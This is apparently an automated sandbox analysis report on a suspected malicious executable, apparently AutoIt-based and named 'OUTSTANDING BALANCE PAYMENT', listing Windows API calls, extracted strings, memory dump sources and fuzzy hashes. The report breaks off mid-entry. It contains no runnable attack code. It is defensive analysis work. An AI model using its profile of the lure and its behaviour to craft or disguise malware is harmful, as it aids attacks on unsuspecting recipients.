                                                          • _wcscmp.LIBCMT ref: 00B9D282
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                          • String ID: %s%u
                                                          • API String ID: 3119225716-679674701
                                                          • Opcode ID: 1ee3dd89ebff4c039a9302e83ec7826503c75580a02d0617586da893af49b834
                                                          • Instruction ID: 2de0cd197ceea563627a670b126804e2588e645578b16fe6245fd4bf5c291a53
                                                          • Opcode Fuzzy Hash: 1ee3dd89ebff4c039a9302e83ec7826503c75580a02d0617586da893af49b834
                                                          • Instruction Fuzzy Hash: 6EA1E371604302AFDB14DF65C884FAAB7E8FF44350F008A69F999D7190DB30E946CBA1
                                                          APIs
                                                          • GetClassNameW.USER32(00000008,?,00000400), ref: 00B9D8EB
                                                          • _wcscmp.LIBCMT ref: 00B9D8FC
                                                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 00B9D924
                                                          • CharUpperBuffW.USER32(?,00000000), ref: 00B9D941
                                                          • _wcscmp.LIBCMT ref: 00B9D95F
                                                          • _wcsstr.LIBCMT ref: 00B9D970
                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00B9D9A8
                                                          • _wcscmp.LIBCMT ref: 00B9D9B8
                                                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 00B9D9DF
                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00B9DA28
                                                          • _wcscmp.LIBCMT ref: 00B9DA38
                                                          • GetClassNameW.USER32(00000010,?,00000400), ref: 00B9DA60
                                                          • GetWindowRect.USER32(00000004,?), ref: 00B9DAC9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                          • String ID: @$ThumbnailClass
                                                          • API String ID: 1788623398-1539354611
                                                          • Opcode ID: 06d19f0ac3e67c196065de278942d86c70067f7a08cd05bbf48b115cad685afd
                                                          • Instruction ID: 949a55e9de9627a5a2b579982e3add9af7581247e3cfcdb128f3227a64183422
                                                          • Opcode Fuzzy Hash: 06d19f0ac3e67c196065de278942d86c70067f7a08cd05bbf48b115cad685afd
                                                          • Instruction Fuzzy Hash: 71819D310083459FDF05DF25C885BAA7BE8EF84314F0484BAFD899A096DB74ED56CBA1
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: __wcsnicmp
                                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                          • API String ID: 1038674560-1810252412
                                                          • Opcode ID: 94724ab047d62f98c9d367b8b1f2be6ca8b05adca04417cfbf9a64629b655a84
                                                          • Instruction ID: fe008cb71f5f0f8ddb85774febb2b687fcf2cf7b25184b30368411a9558c10a2
                                                          • Opcode Fuzzy Hash: 94724ab047d62f98c9d367b8b1f2be6ca8b05adca04417cfbf9a64629b655a84
                                                          • Instruction Fuzzy Hash: F231B035A48209EADF14FB51CD93EEDB3E49F22740F2001F9F542B10E2EB55AE54E651
                                                          APIs
                                                          • LoadIconW.USER32(00000063), ref: 00B9EAB0
                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00B9EAC2
                                                          • SetWindowTextW.USER32(?,?), ref: 00B9EAD9
                                                          • GetDlgItem.USER32(?,000003EA), ref: 00B9EAEE
                                                          • SetWindowTextW.USER32(00000000,?), ref: 00B9EAF4
                                                          • GetDlgItem.USER32(?,000003E9), ref: 00B9EB04
                                                          • SetWindowTextW.USER32(00000000,?), ref: 00B9EB0A
                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00B9EB2B
                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00B9EB45
                                                          • GetWindowRect.USER32(?,?), ref: 00B9EB4E
                                                          • SetWindowTextW.USER32(?,?), ref: 00B9EBB9
                                                          • GetDesktopWindow.USER32 ref: 00B9EBBF
                                                          • GetWindowRect.USER32(00000000), ref: 00B9EBC6
                                                          • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00B9EC12
                                                          • GetClientRect.USER32(?,?), ref: 00B9EC1F
                                                          • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00B9EC44
                                                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00B9EC6F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                          • String ID:
                                                          • API String ID: 3869813825-0
                                                          • Opcode ID: 029e6a4c08982c73488a3dacc6199b055703c2889cc5a6d995fed99e3dba8cf4
                                                          • Instruction ID: 7925249f5720030db85784c86ac6e3db15c36a05a829d5a7241ded87772a224a
                                                          • Opcode Fuzzy Hash: 029e6a4c08982c73488a3dacc6199b055703c2889cc5a6d995fed99e3dba8cf4
                                                          • Instruction Fuzzy Hash: 87513C71900709AFDB20DFA8CD89B6EBBF5FF04705F004968E696A65A0DBB5E944CB10
                                                          APIs
                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 00BB79C6
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00BB79D1
                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00BB79DC
                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 00BB79E7
                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 00BB79F2
                                                          • LoadCursorW.USER32(00000000,00007F81), ref: 00BB79FD
                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 00BB7A08
                                                          • LoadCursorW.USER32(00000000,00007F80), ref: 00BB7A13
                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 00BB7A1E
                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 00BB7A29
                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 00BB7A34
                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 00BB7A3F
                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00BB7A4A
                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 00BB7A55
                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00BB7A60
                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 00BB7A6B
                                                          • GetCursorInfo.USER32(?), ref: 00BB7A7B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Cursor$Load$Info
                                                          • String ID:
                                                          • API String ID: 2577412497-0
                                                          • Opcode ID: 72e027c174fbd7719581d2b44fda156bf9ba1969c6ceda7b87023103e5e909c1
                                                          • Instruction ID: 735b667eb88e0705b5976afe64bdd04147d811cee8317130ab6873c71c34ce39
                                                          • Opcode Fuzzy Hash: 72e027c174fbd7719581d2b44fda156bf9ba1969c6ceda7b87023103e5e909c1
                                                          • Instruction Fuzzy Hash: 0331E9B1D483196BDB509FB68C899AFBFE8FF44750F504526E50DE7280DAB8A5008F91
                                                          APIs
                                                            • Part of subcall function 00B7E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00B6C8B7,?,00002000,?,?,00000000,?,00B6419E,?,?,?,00BFDC00), ref: 00B7E984
                                                            • Part of subcall function 00B6660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B653B1,?,?,00B661FF,?,00000000,00000001,00000000), ref: 00B6662F
                                                          • __wsplitpath.LIBCMT ref: 00B6C93E
                                                            • Part of subcall function 00B81DFC: __wsplitpath_helper.LIBCMT ref: 00B81E3C
                                                          • _wcscpy.LIBCMT ref: 00B6C953
                                                          • _wcscat.LIBCMT ref: 00B6C968
                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00B6C978
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00B6CABE
                                                            • Part of subcall function 00B6B337: _wcscpy.LIBCMT ref: 00B6B36F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                          • API String ID: 2258743419-1018226102
                                                          • Opcode ID: ca7e4ae0b845f273008d1bdfa51e90e5cfa80afa01859c9a02bb2646c01334b3
                                                          • Instruction ID: 714d134dabbe63690bff2e3b373a15f05b30ad8f881c4eb37adde62693dc499d
                                                          • Opcode Fuzzy Hash: ca7e4ae0b845f273008d1bdfa51e90e5cfa80afa01859c9a02bb2646c01334b3
                                                          • Instruction Fuzzy Hash: 7A129D315083419FC724EF24C881AAFBBE5EF99714F0449AEF58993262DB34DA49CB53
                                                          APIs
                                                          • _memset.LIBCMT ref: 00BCCEFB
                                                          • DestroyWindow.USER32(?,?), ref: 00BCCF73
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00BCCFF4
                                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00BCD016
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BCD025
                                                          • DestroyWindow.USER32(?), ref: 00BCD042
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00B60000,00000000), ref: 00BCD075
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BCD094
                                                          • GetDesktopWindow.USER32 ref: 00BCD0A9
                                                          • GetWindowRect.USER32(00000000), ref: 00BCD0B0
                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00BCD0C2
                                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00BCD0DA
                                                            • Part of subcall function 00B7B526: GetWindowLongW.USER32(?,000000EB), ref: 00B7B537
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                          • String ID: 0$tooltips_class32
                                                          • API String ID: 3877571568-3619404913
                                                          • Opcode ID: 9c3ad099b60427465e5dc0abe2dc00283703fe57fc084215192c2a92296126f8
                                                          • Instruction ID: 486e608e59be6e55ace5c577dc074c883712fe1d7468e0e8bfe788df7ef98867
                                                          • Opcode Fuzzy Hash: 9c3ad099b60427465e5dc0abe2dc00283703fe57fc084215192c2a92296126f8
                                                          • Instruction Fuzzy Hash: C971D0B4150345AFD720CF28CC95FAA77E5EB88704F08456EF9858B2A1DB74E946CB12
                                                          APIs
                                                            • Part of subcall function 00B7B34E: GetWindowLongW.USER32(?,000000EB), ref: 00B7B35F
                                                          • DragQueryPoint.SHELL32(?,?), ref: 00BCF37A
                                                            • Part of subcall function 00BCD7DE: ClientToScreen.USER32(?,?), ref: 00BCD807
                                                            • Part of subcall function 00BCD7DE: GetWindowRect.USER32(?,?), ref: 00BCD87D
                                                            • Part of subcall function 00BCD7DE: PtInRect.USER32(?,?,00BCED5A), ref: 00BCD88D
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00BCF3E3
                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00BCF3EE
                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00BCF411
                                                          • _wcscat.LIBCMT ref: 00BCF441
                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00BCF458
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00BCF471
                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00BCF488
                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00BCF4AA
                                                          • DragFinish.SHELL32(?), ref: 00BCF4B1
                                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00BCF59C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                          • API String ID: 169749273-3440237614
                                                          • Opcode ID: 2b81ed6905397b49f2539df2489b048af9b03bc33b4f170c3855a82c877b7264
                                                          • Instruction ID: f854e509415feb9d253258e2d959ce3d2334721f3854a737067d1c37006acf57
                                                          • Opcode Fuzzy Hash: 2b81ed6905397b49f2539df2489b048af9b03bc33b4f170c3855a82c877b7264
                                                          • Instruction Fuzzy Hash: CD616971108301AFC715EF64CC85EAFBBF8EF99710F000A6EF695961A1DB709A09CB52
                                                          APIs
                                                          • VariantInit.OLEAUT32(00000000), ref: 00BAAB3D
                                                          • VariantCopy.OLEAUT32(?,?), ref: 00BAAB46
                                                          • VariantClear.OLEAUT32(?), ref: 00BAAB52
                                                          • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00BAAC40
                                                          • __swprintf.LIBCMT ref: 00BAAC70
                                                          • VarR8FromDec.OLEAUT32(?,?), ref: 00BAAC9C
                                                          • VariantInit.OLEAUT32(?), ref: 00BAAD4D
                                                          • SysFreeString.OLEAUT32(00000016), ref: 00BAADDF
                                                          • VariantClear.OLEAUT32(?), ref: 00BAAE35
                                                          • VariantClear.OLEAUT32(?), ref: 00BAAE44
                                                          • VariantInit.OLEAUT32(00000000), ref: 00BAAE80
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                          • API String ID: 3730832054-3931177956
                                                          • Opcode ID: 86a7ef2fdab62ce2b34147356605882ec2d3ec8b13bb796208b4b72e045784ba
                                                          • Instruction ID: 49364190dda1605ebf651e72ce18b8ea93b5b0f36c6cfabf9ab62d4e23c94008
                                                          • Opcode Fuzzy Hash: 86a7ef2fdab62ce2b34147356605882ec2d3ec8b13bb796208b4b72e045784ba
                                                          • Instruction Fuzzy Hash: A5D1BD71A08205EBDB209F65C885B7AB7F5FF06B00F2484E5E455AB280DB74AD40DBB2
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?), ref: 00BC71FC
                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00BC7247
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: BuffCharMessageSendUpper
                                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                          • API String ID: 3974292440-4258414348
                                                          • Opcode ID: 62055ffb277534ca094ac7716a47cab63dcbdfd67d3041178514dfe6a6db00da
                                                          • Instruction ID: 96ad6191515df25d9e58aa55c300c1f96bb9bbb6c3b1d384692733612765088c
                                                          • Opcode Fuzzy Hash: 62055ffb277534ca094ac7716a47cab63dcbdfd67d3041178514dfe6a6db00da
                                                          • Instruction Fuzzy Hash: 93915E742446019BCF05EF24C491A6EB7E5EF95310F0488ECF89A5B392DB34ED46DB85
                                                          APIs
                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00BCE5AB
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00BCBEAF), ref: 00BCE607
                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00BCE647
                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00BCE68C
                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00BCE6C3
                                                          • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,00BCBEAF), ref: 00BCE6CF
                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00BCE6DF
                                                          • DestroyIcon.USER32(?,?,?,?,?,00BCBEAF), ref: 00BCE6EE
                                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00BCE70B
                                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00BCE717
                                                            • Part of subcall function 00B80FA7: __wcsicmp_l.LIBCMT ref: 00B81030
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                          • String ID: .dll$.exe$.icl
                                                          • API String ID: 1212759294-1154884017
                                                          • Opcode ID: efe3bd18e1e5fea1389c9393180b4aacb0a0c255302c4b0ddd3ff6af0c292059
                                                          • Instruction ID: b38ca756e2582e34ad04099acaf3bbe91e86203fca0b66cbd644a1fc9c899f36
                                                          • Opcode Fuzzy Hash: efe3bd18e1e5fea1389c9393180b4aacb0a0c255302c4b0ddd3ff6af0c292059
                                                          • Instruction Fuzzy Hash: 3661AF71610215FAEB14AF64CC86FAA7BE8FB18754F104259F925DB1D0EBB4D980CB60
                                                          APIs
                                                            • Part of subcall function 00B6936C: __swprintf.LIBCMT ref: 00B693AB
                                                            • Part of subcall function 00B6936C: __itow.LIBCMT ref: 00B693DF
                                                          • CharLowerBuffW.USER32(?,?), ref: 00BAD292
                                                          • GetDriveTypeW.KERNEL32 ref: 00BAD2DF
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BAD327
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BAD35E
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BAD38C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                          • API String ID: 1148790751-4113822522
                                                          • Opcode ID: 1751c8c8161043d6d5735713082076e4317baa595821863fa6e48fee448420a7
                                                          • Instruction ID: bc36bb916fc4986f46694947e106c5e0584dc3e3b2881ce05c013283d6cbd533
                                                          • Opcode Fuzzy Hash: 1751c8c8161043d6d5735713082076e4317baa595821863fa6e48fee448420a7
                                                          • Instruction Fuzzy Hash: 5C512B711043459FC700EF24C88196EB7F8EF99758F0089ADF89AA7261DB35EE06DB52
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00BD3973,00000016,0000138C,00000016,?,00000016,00BFDDB4,00000000,?), ref: 00BA26F1
                                                          • LoadStringW.USER32(00000000,?,00BD3973,00000016), ref: 00BA26FA
                                                          • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00BD3973,00000016,0000138C,00000016,?,00000016,00BFDDB4,00000000,?,00000016), ref: 00BA271C
                                                          • LoadStringW.USER32(00000000,?,00BD3973,00000016), ref: 00BA271F
                                                          • __swprintf.LIBCMT ref: 00BA276F
                                                          • __swprintf.LIBCMT ref: 00BA2780
                                                          • _wprintf.LIBCMT ref: 00BA2829
                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00BA2840
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
